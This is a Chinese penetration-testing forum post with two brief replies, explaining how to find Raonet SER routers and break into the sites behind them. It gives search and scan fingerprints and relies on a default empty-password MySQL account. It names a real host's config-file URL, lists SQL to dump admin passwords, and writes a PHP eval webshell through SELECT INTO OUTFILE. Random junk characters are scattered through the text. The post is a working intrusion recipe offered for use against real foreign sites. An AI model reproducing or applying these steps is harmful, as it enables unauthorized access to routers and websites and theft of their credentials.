中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
. n# ?$ X9 u' L9 K* Q# H
5 U4 l) x1 E  s, J+ k5 \1:google搜索'Raonet Subscriber Ethernet Router'
4 v2 t- b1 [( D8 {  o, z
! k3 _4 U6 n7 R5 {$ R2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20011 j0 g3 E* \& y( U& y$ Z. ~% l- H# I
7 D% h  l) T# v7 C5 d* G4 M+ V
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。2 q+ }, E) b# @* T8 O2 L
8 |6 n5 s9 I! M0 Z
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......+ Z+ U: W3 _. d3 b- x

3 z/ x  O  Q& j6 M# {8 s + R# v0 [9 c6 x, O

1 K, \. d9 Q4 `9 i  a入侵步骤:  a! j1 _1 R, d; k0 }
. w5 {7 C& ?- p2 M7 g! y% O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
$ B% x$ G5 i) O* q4 _. t4 c4 h* b/ K8 _
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc! s* x& B, j5 u
3:得到密码后连接,查看GUI管理密码:
% a' d7 n) @4 Z- f: J8 ~use ser_500
* W9 u5 R# g7 F/ [+ P: D3 h5 kselect id,passwd from user;
% w/ g) u/ y  N7 S, P. f4:通过数据库写入webshell,执行命令:7 l2 K. w* s+ Z
use mysql;. z" t6 ~8 k- p2 u+ Z
create table ok(cmd TEXT);
4 `. Q2 {( k+ `# {' Qinsert into ok values("<?php @eval($_POST[cmd])?>");
: L7 o" u, I0 T# Eselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: p& I( P0 o: I2 @$ `' o& Mdrop table ok;
9 Z- _; R, {* C+ A& v3 k# Z- k* b* t5 R5 F' Z/ `2 p
5:连接后门shell.php
+ I0 v& R% |9 E4 X; p: R
6 N. |4 `$ Y8 u" V% O  ^6. 搞定!
' l& }9 f0 T# d) s5 p' O2 m" e

作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2